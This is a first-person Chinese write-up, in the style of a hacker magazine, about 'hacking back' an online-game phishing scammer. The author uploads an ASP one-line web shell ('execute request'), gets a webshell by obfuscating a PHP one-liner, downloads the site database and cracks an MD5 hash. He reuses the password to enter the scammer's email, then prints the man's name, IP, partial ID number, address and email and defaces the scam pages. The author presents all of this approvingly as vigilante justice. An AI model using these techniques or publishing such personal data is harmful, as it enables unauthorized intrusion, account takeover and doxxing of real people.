社会工程学——骗子，是你耍我还是我耍你？
小帅@[0.S.T]\杭州跟山中学

某天，小菜我在玩梦幻，为了去成都，我可是决定好好的学习了，最后一次的GAME，玩个爽快吧。师门做玩刷官职。然后跑镖一切都很顺利的进行着。突然的一下，某人加了我的帐号然后找我说是某地方能领奖的，呵呵。几岁的小鬼啊。这都骗到爷爷头上来了，我一向狠死骗子的，于是就开始了反骗子之旅。
他一开始让我去http://reg.txt.cn填写资料然后领取东西，一看就知道只是注册了个txt的cn玉米。根本没什么噱头。如图1

 
（图1）

哈哈，还说自己有500点的点卡。真是XXX，好了，我就开始和他慢慢聊。记得上次买的社会工程学里的（黑手的那个本），介绍说，人的性格分好几种，我看来，骗子属于无所谓，比较耐心的一种，那我就利用这个来和他慢慢聊。如图2

  
（图2）

我的GAME里的 ID是“龙城之帝”，我就假装不大懂电脑般的聊，为了防止他警惕我而不和我讲话，这样的话就少了信息啦！看看下图，图3

 
（图3）

破学狂攻之类的武器属性的东西比较贵，要知道，一个就要多少大洋啊，估算着，小菜我得写多少文章啊，我就吹嘘：“刚才300W买了个破血”，我假借游戏里的一个活动：科举要开始了拖延时间，那我那个时间在干什么呢？！当然是在看网站的结构，在一边看和一边交流的过程中，你会发现很多事，比如网站的一些信息可以随时从对方的口中知道，然而对方没料到的是：我，不是，电脑白痴！我们来看下他建站的信息吧：
首先、他选择了个免费空间，用location来实现跳转。达到欺骗的效果。如图4

 
 
（图4）

很逼真的东西，还冒充奥运，这类人不应该在这个世界上，在文章最后你会知道我为什么这么说。如图5

 
（图5）

这个页面相当逼真。不知道的人一定很顺手的写上去了。随便加了个单引号上去提交。对方的页面到了yahoo的某东西上去，貌似是通过xss的urlcode加密的站，弹出个ok的对话框，呵呵，现在这个潜在的外部的xss也被他利用上了，这个现不管，我也和他一起在那个免费空间注册了个账号，用户为xiaoshua，（少了i），然后成功注册后去看管理页面，如图6

 
（图6）

一看能上传。好，我们开始上传，哪有那么简单就上传上去的啊！当管理是白痴吗？！这个问题困扰了我很久，当上传的东西为一句话或者木马之类的马上提示错误，如图7

 
（图7）

有那个就不行，我就想了，这个能在线编辑，试着把html换成asp的扩展名，然后写“<script languge=vbscript runnat=server>execute request(“fuckj”)</script>”这样的好处就是避开了asp脚本标记。但是不信的发生了，貌似做了措施，无论怎样，后面的地方总会被系统插入什么的，然后提示就变成了Microsoft VBScript 编译器错误 错误 '800a0408'
无效字符
/User/Free100/xiaoshua/index.asp，行 1
eval%20request%28%22%23%22%29
----^
这个不知道怎么。难道就这么放弃了？我才不会，我最最最最最痛恨骗子了！！！想了下，这个空间会不会是全能的呢？支持全部脚本的呢？尝试php失败。最后用php一句话进行在线2次加密才对，其中还爆出了物理路径，呵呵，最后拿到了webshell，如图8

（图8）

不大习惯这个连接端，因为反应比较慢。下载了个angel的spy2008观察之，其实在脑子里就要想好下一步棋怎么样走，我选择了找这个网站的数据库，不知道为什么，总觉对网站检测多了就比较顺手了，找到了conn.asp看到了数据库，如图9

 
（图9）

，接下来就不需要我多说了，既然他注册了账号，那数据库里肯定有信息啦，但是目录很多，我就开始核对时间，测试时间，我是5月11号注册的，知道他的用户是mhxy，因为大家看我的上传页面的路径里有个xiaoshua，也就是部分路径是按照你的username写的。找到了最新的数据库后就下载下来，然后看user表去了，如图10

 
（图10）

大家稍微仔细看下就知道，最后个用户“xiaoshua”（小刷）就是我因为少了个i注册的用户，编码11963的mhxy就是“梦幻西游”的缩写了，目标就是他，然后拿出密码开始跑，成功抛出了MD5如图11

 
（图11）

问了下群里的人，有的人说想电话，看了下他的资料，姓名是：李安。不确定真假，用这个密码去登陆他的cnzz统计，无法登陆，那先算了，其实这个user表里有很多的xy163之类的帐户，因为梦幻西游的官方网站就类似xy3.163之类的，看来可能是团伙作案，呵呵，数据库的作用很大，继续找信息，李安，男，32岁，广东人，邮箱：tyty_XXXX@126.com描述为：梦幻西游，最后登陆IP为：125.90.101.45，为了确认他的资料是否正确，我们只要看下他的IP地址就行了，插了下IP，结果如图12

 
（图12）

的确是广州茂名市的人，这样电话，前面填写的资料的信任度应该为80%了，E-mail是大家喜欢的东西，因为它能搜到更多的信息，于是开始baidu和google，没搜到任何信息，看来是个不混论坛的人，试着用20151120这个密码进他的邮箱吧，没想到进去了，嗯，看下了下，资料满齐全的，这个人也是个玩梦幻的人，于是我开始更深入的社工他，道理很简单：我讨厌骗子！！结果如图13

 
（图13）

偶滴娘喂~~这个人真是个坏蛋啊！十足的大坏蛋，男人不是坏蛋，骗子才是坏蛋！各位女同胞们以后别再骂男人了，男人也有尊严……跑题了，这个里面有信，其中有个信里比较有价值的就是，
尊敬的李安您好：
    谢谢您在我们这里注册成为我们网站的会员，你的会员
帐号为：261593，会员密码为：XXXX。通过此帐
号和密码就可以登陆你的会员中心，方便快捷的实时开通你
需要的新业务，包括域名、空间、邮局、网站推广等服务。
    再次感谢您对我们的支持！
公司：网信科技 - [网通电信-域名注册双线路空间服务器租用]
地址：陕西省咸阳市朝阳五路北口
电话：029-33432627
网址：http://www.oXot.cn/
呵呵，还注册了个东西的，估计又是什么空间的，下定决心继续挖掘信息。把他邮箱克隆到自己的邮箱然后慢慢看个够。后来又发现了个好东西：
尊敬的 韩永金 你好：
    您的将军令已于2007年09月02日 09点33分 被启用， 您填写了如下注册信息：
    用户姓名：韩永金
    证件类型：身份证
    证件号码：440981199010******
    移动电话：
    固定电话：066XXXX
    电子邮箱：tyty_005@126.com
    通信地址：广东茂名市名湖街5XXX号
    邮政编码：525200
    您的将军令信息如下：
    制造日期: 2007年07月24日 03点31分
    启用日期：2007年09月02日 09点33分
    过期日期：2010年07月24日 00点00分
    当前状态：正常
    状态改变时间：2007年09月02日 09点33分
    祝您使用愉快！
网易将军令客户服务中心
2007年09月02日 09点33分
仔细看下，韩永金这个名字肯定是韩国的，因为推行了防沉迷的系统，所以随便找个身份证就行，他的名字叫李安。固定电话什么的可以申诉，于是就跑去163了。可惜申诉不到。这个时候我想到了电话，电话如果……能把来电显示换成北京网监的就好了，我记得黑手的社工书上有个叫秦力的人知道怎么破解。小菜我不会。听说那东西580快一个，我比较穷。就不忽悠那个人了，上Game在游戏里一贴，XX是骗子证据XX.ok，我的责任完了。然后把他的骗子页面全部改个版本。小帅的版本，如图14

 
（图14）

要是我有那个500多快的东西就好了。文章写玩了。骗子应该没人会去相信了。站点也搞清楚了。他的密码还在我手里。因为我要上学的，也没那么长的时间来监视他的行动。领会精神领会精神就行

下载附件